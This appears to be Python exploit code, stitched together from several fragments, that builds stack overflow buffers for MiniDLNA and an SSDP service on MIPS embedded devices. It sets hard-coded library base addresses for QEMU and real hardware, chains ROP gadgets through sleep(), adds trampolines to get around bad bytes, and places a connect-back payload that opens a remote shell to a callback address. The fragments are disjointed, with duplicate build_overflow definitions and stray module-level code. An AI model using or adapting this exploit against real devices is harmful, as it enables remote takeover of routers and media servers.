def build_overflow(self,
target_ip_address,
encoder_class=None,
qemu=False):
badbyte_list = ['\x00']
for k in self.__class__.minidlna_badbytes.keys():
badbyte_list.append(k)
sc = SectionCreator(self.endianness, badchars=badbyte_list)
#Must take into account length if IP addr
#since it's part of the sprintf() that overflows
offset_modifier = self.offset_modifier
sections = self.__class__.minidlna_rop_gadgets(self.offset_modifier,
qemu)
trampoline_1 = Trampoline(self.endianness, -672)
section = sc.string_section(
684 - offset_modifier,
trampoline_1.shellcode,
description="First trampoline payload, jump back 672")
sections.append(section)
#1028, or 0x404, is the smallest operand to MIPS beq that
#can >>2 bits and still have both bytes be non-null
trampoline_2 = Trampoline(self.endianness, 1028)
section = sc.string_section(
16 - offset_modifier,
trampoline_2.shellcode,
description="Second trampoline payload, jump forward 1028 ")
sections.append(section)
payload = ConnectbackPayload(self.callback_ip_address,
self.endianness,
port=self.port)
if encoder_class:
encoded_payload = encoder_class(payload, badchars=badbyte_list)
payload = encoded_payload
section = sc.string_section(1048 - offset_modifier,
payload.shellcode,
description="connect-back payload")
sections.append(section)
buf = OverflowBuffer(self.endianness,
self.overflow_len,
sections,
logger=self.logger)
return buf
qemu_libwlbcmshared_base=0x40942000
qemu_libc_base=0x4085b000
actual_libc_base=0x2aabe000
actual_libwlbcmshared_base=0x2aba1000
if QEMU:
libc_base=qemu_libc_base
libwlbcmshared_base=qemu_libwlbcmshared_base
else:
libc_base=actual_libc_base
libwlbcmshared_base=actual_libwlbcmshared_base
SC=SectionCreator(BigEndian,base_address=libc_base,badchars=["\x00"])
################################################################################
#an address in libwlbcmshared.so
#index in +0x50 is a a pointer that points to itself.
#That pointer + 0x2c is all NULL bytes and
#should cause ssdp_msearch_repsonse() to bail without crashing
################################################################################
section=SC.gadget_section(140,
0x1ECBC,
base_address=libwlbcmshared_base,
description= "upnp_context placeholder.")
################################################################################
def minidlna_rop_gadgets(cls, offset_modifier, qemu=False):
libc = 0
#libavcodec=0
badbyte_list = ['\x00']
for k in cls.minidlna_badbytes.keys():
badbyte_list.append(k)
if qemu:
libc = cls.libc_qemu
#libavcodec=cls.libavcodec_qemu
else:
libc = cls.libc_actual
#libavcodec=cls.libavcodec_actual
sc = SectionCreator(cls.endianness,
base_address=libc,
badchars=badbyte_list)
reg_ra = 600 - offset_modifier
reg_s0 = 564 - offset_modifier
reg_s1 = 568 - offset_modifier
reg_s2 = 572 - offset_modifier
reg_s3 = 576 - offset_modifier
reg_s4 = 580 - offset_modifier
reg_s6 = 588 - offset_modifier
gadgets = []
#placeholders one and two get added together and passed as dst into memcpy(). They must add
#up to be a writable address."
gadget = sc.gadget_section(
#752-offset_modifier,
736 - offset_modifier,
0x15a3c932,
base_address=0,
description="placeholder 1 to avoid crashing memcpy.")
gadgets.append(gadget)
gadget = sc.gadget_section(
752 - offset_modifier,
0x15a3c932,
base_address=0,
description="placeholder 2 to avoid crashing memcpy.")
gadgets.append(gadget)
#load 1 into $a0, jalr $s3
gadget = sc.gadget_section(
reg_ra,
0x00025110,
description="reg $ra. set up 3 sec arg to sleep(). jalr $s6.")
gadgets.append(gadget)
#load stack data into $ra, jr $s1
gadget = sc.gadget_section(
reg_s6,
0x0001D95C,
description="[reg $s6] setup ra before sleep(). jr $s1")
gadgets.append(gadget)
#address of sleep
gadget = sc.gadget_section(
reg_s1,
0x506c0,
description=
"[reg $s1] Address of sleep() in libc. be sure to set up $ra and $a0 before calling.",
)
gadgets.append(gadget)
#[reg $s3] placeholder that allows $s3 to be dereferenced without crashing.
gadget = sc.gadget_section(
reg_s3,
0x00011918,
description=
"[reg $s3] placeholder that allows $s3 to be dereferenced without crashing."
)
gadgets.append(gadget)
#[reg $ra] offset from $sp into $a2, jalr $s1.
gadget = sc.gadget_section(
640 - offset_modifier,
0x00011918,
description="[reg $ra] offset from $sp into $a2, jalr $s1.")
gadgets.append(gadget)
#move $a2 to $s0, jalr $s4
gadget = sc.gadget_section(
632 - offset_modifier,
0x0003434C,
description="[reg $s0] move $a2 to $s0, jalr $s4")
gadgets.append(gadget)
gadget = sc.gadget_section(reg_s4,
0x0000BA84,
description="[reg $s4] jalr $s0")
gadgets.append(gadget)
return gadgets
def build_overflow(self,
target_ip_address,
encoder_class=None,
qemu=False):
self.logger.LOG_DEBUG("offset modifier: %d" % self.offset_modifier)
badbyte_list = ['\x00']
for k in self.__class__.minidlna_badbytes.keys():
badbyte_list.append(k)
if self.qemu:
libc = self.libc_qemu
else:
libc = self.libc_actual
offset_modifier = self.offset_modifier
reg_ra = 600 - offset_modifier
reg_s0 = 564 - offset_modifier
reg_s1 = 568 - offset_modifier
reg_s2 = 572 - offset_modifier
reg_s3 = 576 - offset_modifier
reg_s4 = 580 - offset_modifier
reg_s5 = 584 - offset_modifier
reg_s6 = 588 - offset_modifier
reg_s7 = 592 - offset_modifier
#after rop into fn epilogue
new_reg_ra = 640 - offset_modifier
new_reg_s0 = 628 - offset_modifier
new_reg_s1 = 632 - offset_modifier
new_reg_s2 = 636 - offset_modifier
SC = SectionCreator(self.endianness,
base_address=libc,
badchars=badbyte_list)
#0x157BB0BA + 0x157BB0BA = 0x2AF76174, which should be somewhere
#in libc's text segment
SC.gadget_section(
752 - offset_modifier,
0x157BB0BA,
base_address=0,
description="placeholder 1 to avoid crashing memcpy.")
SC.gadget_section(
768 - offset_modifier,
0x157BB0BA,
base_address=0,
description="placeholder 2 to avoid crashing memcpy.")
SC.gadget_section(reg_ra,
0x00028028,
description="[ra] load 1 into $a0, jalr $s3")
SC.gadget_section(
reg_s2,
0x00028028 + 0x7E88,
description=
"[s2] readonly placeholder to avoid crashing rop gadget.")
SC.gadget_section(
reg_s3,
0x0001D95C,
description="[s3] load stack offset into ra, jalr $s1")
SC.gadget_section(reg_s1,
0x000506C0,
description="[s1] address of sleep")
SC.gadget_section(
new_reg_ra,
0x000427A8,
description="[ra] load $sp+0xE0+var_C0 into $s0, jalr $s6")
SC.gadget_section(reg_s6,
0x0000BA84,
description="[s6] jump into stack via $s0")
SC.gadget_section(
new_reg_s2,
0x00028028,
description=
"[s2] readonly placeholder to avoid crashing stack finder gadget.")
trampoline_1 = Trampoline(self.endianness, -664)
section = SC.string_section(
676 - offset_modifier,
trampoline_1.shellcode,
description="First trampoline payload, jump back 664")
#1028, or 0x404, is the smallest operand to MIPS beq that
#can >>2 bits and still have both bytes be non-null
trampoline_2 = Trampoline(self.endianness, 1028)
section = SC.string_section(
16 - offset_modifier,
trampoline_2.shellcode,
description="Second trampoline payload, jump forward 1028 ")
payload = ConnectbackPayload(self.callback_ip_address,
self.endianness,
port=self.port)
if encoder_class:
encoded_payload = encoder_class(payload, badchars=badbyte_list)
payload = encoded_payload
#payload has to go at 1048 since trampoline minimum forward jump is
#1028. 1028+trampoline offset+4 = 1048
section = SC.string_section(1048 - offset_modifier,
payload.shellcode,
description="connect-back payload")
buf = OverflowBuffer(self.endianness,
self.overflow_len,
SC.section_list,
logger=self.logger)
return buf
